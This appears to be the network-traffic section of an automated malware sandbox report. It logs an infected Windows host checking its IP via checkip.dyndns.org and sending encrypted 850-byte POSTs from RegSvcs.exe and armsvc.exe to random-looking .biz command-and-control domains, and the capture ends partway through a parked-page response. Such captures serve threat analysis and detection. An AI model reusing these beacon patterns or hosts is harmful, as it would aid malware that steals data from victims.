                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: pywolwnvd.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.760142088 CET850OUTData Raw: 3d b3 84 68 e4 60 cf cc 46 03 00 00 b4 6f b6 78 c6 c2 1b 2e ab e3 a5 ae 76 4c f9 df 27 5e b5 1d 80 3d 85 ff 09 30 11 f9 cd fc e7 a7 36 dc 8e 17 89 4b 00 8c 79 e3 f0 50 50 56 1e d7 0f 17 97 ef 04 11 e7 75 87 07 b2 c8 57 2e 54 f8 a0 25 96 13 e1 e9
                                                                                                                                                                                                                            Data Ascii: =h`Fox.vL'^=06KyPPVuW.T%Qa} QVII.ZJ$%E1!i?X?/,~dv]7>Rb+c7G+c>n:Wf]rM^kGuxhbF-Uh1a
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.041053057 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:19 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: btst=b810ae0d2268d11b6797ee538c34d63a|8.46.123.189|1734354619|1734354619|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            1192.168.2.449731158.101.44.242807360C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.886172056 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.088876009 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:19 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Content-Length: 104
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            X-Request-ID: 62ff3195da4baf2648254ff213879f7e
                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.094667912 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.468091011 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:20 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Content-Length: 104
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            X-Request-ID: c97f6ba1d59e18b7dff915a38710daf4
                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.687941074 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.069758892 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:27 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Content-Length: 104
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            X-Request-ID: a3faf5a7318ddd7769676cd494b3c3b9
                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            2192.168.2.44973318.141.10.107807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.958446026 CET349OUTPOST /ndknji HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: ssbzmoy.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.958460093 CET850OUTData Raw: 3a 6c 30 0a 7e ce ca 3e 46 03 00 00 b6 f4 36 4d 73 0f 57 9e ee 13 26 64 bc 9f ae 54 55 bc 9a fc ba 6f 01 3b 87 fd 9e bd 76 0e fa 7c 3f f8 61 3c 17 68 2e 07 3c 30 6e 89 f4 d3 f0 36 91 58 de 02 42 8d ff 2c f4 85 64 67 5b 51 6c 34 c4 fa 4e 56 b8 5a
                                                                                                                                                                                                                            Data Ascii: :l0~>F6MsW&dTUo;v|?a<h.<0n6XB,dg[Ql4NVZPa7oWb1G"4/4A\esr(1%=lCc2~ v;l`VucNu;R;bFNA\O>zZ7FF|DT&QJ]
                                                                                                                                                                                                                            Dec 16, 2024 14:10:22.965517044 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:22 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: btst=d2a54b541ec38eac7929fee22a9f1069|8.46.123.189|1734354622|1734354622|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            3192.168.2.44973454.244.188.177807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:10:23.685245037 CET343OUTPOST /dy HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: cvgrf.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:10:23.685316086 CET850OUTData Raw: 66 73 52 94 5c c8 ec 37 46 03 00 00 30 f8 9e 1d 98 5f ad d6 43 36 c2 ea 5b 40 0e 4e 2d 14 cc e5 61 80 7b 3c 49 a9 54 cb d1 ef ee 05 c1 a6 c6 b2 02 ea 6b c6 4a c4 ae 2b 06 56 3f 4c e2 b6 32 d0 bd 29 8d 99 ea 7d 61 a4 a3 a3 56 8f d2 50 81 41 48 e9
                                                                                                                                                                                                                            Data Ascii: fsR\7F0_C6[@N-a{<ITkJ+V?L2)}aVPAH=^8Qx4mM~{j4xGw+Mcgt"i:utl]z7S8|g*s l}r| $=RCliA$*urgKzZDnu
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.037020922 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:24 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: btst=9e017a9da5253b13376eb05e8fb269bb|8.46.123.189|1734354624|1734354624|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            4192.168.2.44973544.221.84.105807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.968132973 CET346OUTPOST /un HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: npukfztj.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.968163013 CET850OUTData Raw: ca d5 3e 56 44 49 7a 18 46 03 00 00 17 83 b8 3b 1e de 1c e5 c3 0c 4e e2 b6 05 b6 59 3b 8b 66 b3 9e 07 48 04 0d f4 a9 11 6c 6b 69 6b f6 c2 9e d1 ee 29 f3 94 69 fd e0 d3 f0 0f 70 00 c6 ab ed 81 f4 5a cb d5 d4 1e 22 6a 99 f0 51 5e fa 4f 94 ea db db
                                                                                                                                                                                                                            Data Ascii: >VDIzF;NY;fHlkik)ipZ"jQ^OU3|%~I'[Tx3B9b}Ik=y",Kx@X6o*'u~bm0rVwPkqrb1t~!?kX7Fk$$l\~7,1{>n|`<G
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.065583944 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:26 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: btst=806a25a6b0c82c2193b2e0338bb13818|8.46.123.189|1734354626|1734354626|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            5192.168.2.449736172.234.222.138807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.035669088 CET347OUTPOST /vuox HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: przvgke.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.035669088 CET850OUTData Raw: 01 ea b5 2e e7 3f e1 72 46 03 00 00 50 67 4a 8d 78 23 6d 34 6e 74 cb 84 89 ee 95 1a 4c 2f 8d 98 f0 81 39 38 2a ab c8 cf f2 fd db e5 f0 21 66 1c 81 52 fe c1 e0 72 6e 14 90 b4 92 f8 02 59 87 c5 e4 52 35 c8 c0 e1 cc ad 31 72 41 17 b6 b3 51 f4 56 8e
                                                                                                                                                                                                                            Data Ascii: .?rFPgJx#m4ntL/98*!fRrnYR51rAQVC[K@s3i=GqL(XeGrE5*\/?ZdAh41!-%MV@/6emXxdv*"8zryqMU}B
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.964426994 CET466INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:28 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                                            Location: http://ww99.przvgke.biz/vuox
                                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.995321989 CET358OUTPOST /asgidloooxieajf HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Host: przvgke.biz
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Content-Length: 850
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.995398045 CET850OUTData Raw: 8f 92 c1 fc a9 78 b5 72 46 03 00 00 71 79 72 2a 83 2e 6d e5 55 d6 c9 3b 69 cd 86 ba f1 de 05 99 a8 c6 03 58 a0 d7 0e f5 20 93 e8 fe 32 f6 bd 12 1b dd 75 21 a6 72 93 97 3c 2f f9 47 2c 5c c2 95 bb 8d bb 81 08 dc 59 4c 0d 2a f7 9a 37 a8 11 85 9f 70
                                                                                                                                                                                                                            Data Ascii: xrFqyr*.mU;iX 2u!r</G,\YL*7p&s+"muy&qLrg4! ATw{lNupv?`zVKv2;rw)Qv$Uyu:3.IwGv"xS9}
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.331868887 CET477INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:33 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                                            Location: http://ww99.przvgke.biz/asgidloooxieajf
                                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            6192.168.2.44973872.52.179.174807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.423388004 CET330OUTGET /vuox HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Host: ww99.przvgke.biz
                                                                                                                                                                                                                            Dec 16, 2024 14:10:30.593115091 CET278INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:30 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Location: http://ww12.przvgke.biz/vuox?usid=25&utid=8251791979
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.333394051 CET341OUTGET /asgidloooxieajf HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Host: ww99.przvgke.biz
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.707448959 CET289INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:33 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Location: http://ww12.przvgke.biz/asgidloooxieajf?usid=25&utid=8251792691
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            7192.168.2.44973976.223.26.96807316C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Dec 16, 2024 14:10:31.435611010 CET354OUTGET /vuox?usid=25&utid=8251791979 HTTP/1.1
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                            Host: ww12.przvgke.biz
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772351027 CET825INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Accept-Ch: viewport-width
                                                                                                                                                                                                                            Accept-Ch: dpr
                                                                                                                                                                                                                            Accept-Ch: device-memory
                                                                                                                                                                                                                            Accept-Ch: rtt
                                                                                                                                                                                                                            Accept-Ch: downlink
                                                                                                                                                                                                                            Accept-Ch: ect
                                                                                                                                                                                                                            Accept-Ch: ua
                                                                                                                                                                                                                            Accept-Ch: ua-full-version
                                                                                                                                                                                                                            Accept-Ch: ua-platform
                                                                                                                                                                                                                            Accept-Ch: ua-platform-version
                                                                                                                                                                                                                            Accept-Ch: ua-arch
                                                                                                                                                                                                                            Accept-Ch: ua-model
                                                                                                                                                                                                                            Accept-Ch: ua-mobile
                                                                                                                                                                                                                            Accept-Ch-Lifetime: 30
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Date: Mon, 16 Dec 2024 13:10:32 GMT
                                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_QfMB7WLSfaa+uoXVbYkUnV/4yBrwykwOwtPR9cK88Ii+5ganh4g2RmcMPfOcneBoB5FTnXfTz0dTkyAwUJdL1Q==
                                                                                                                                                                                                                            X-Domain: przvgke.biz
                                                                                                                                                                                                                            X-Pcrew-Blocked-Reason:
                                                                                                                                                                                                                            X-Pcrew-Ip-Organization: CenturyLink
                                                                                                                                                                                                                            X-Subdomain: ww12
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772660017 CET1236INData Raw: 33 64 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
                                                                                                                                                                                                                            Data Ascii: 3d92<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_QfMB7WLSfaa+uoXVbYkUnV/4yBrwykwOwtPR9cK88Ii+5ganh4g2RmcMPfOcneBoB5FTn
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772749901 CET1236INData Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f
                                                                                                                                                                                                                            Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;-moz-border-radiu
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772763968 CET1236INData Raw: 3b 0a 7d 0a 0a 2e 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 32 72 65 6d 20 31 72 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 72 65 6d 3b 0a 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: ;}.footer { color:#626574; padding:2rem 1rem; font-size:.8rem; margin:0 auto; max-width:440px;}.footer a:link,.footer a:visited { color:#626574;}.sale_link_bold a,.sale_link,.sale_link a { color:#626574
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772882938 CET1236INData Raw: 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 31 37 2c 20 33 38 2c 20 37 37 29 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 0a
                                                                                                                                                                                                                            Data Ascii: tom: 20px; background-color: rgb(17, 38, 77); text-decoration-line: none; font-size: 18px; font-weight: 700; color: #ffffff; text-align: left;}.fallback-arrow { float: right; width: 24px; height: 24px;
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772896051 CET1236INData Raw: 20 3c 68 31 3e 70 72 7a 76 67 6b 65 2e 62 69 7a 3c 2f 68 31 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 63 48 6f 6c 64 65 72 22 3e 0a 20 20
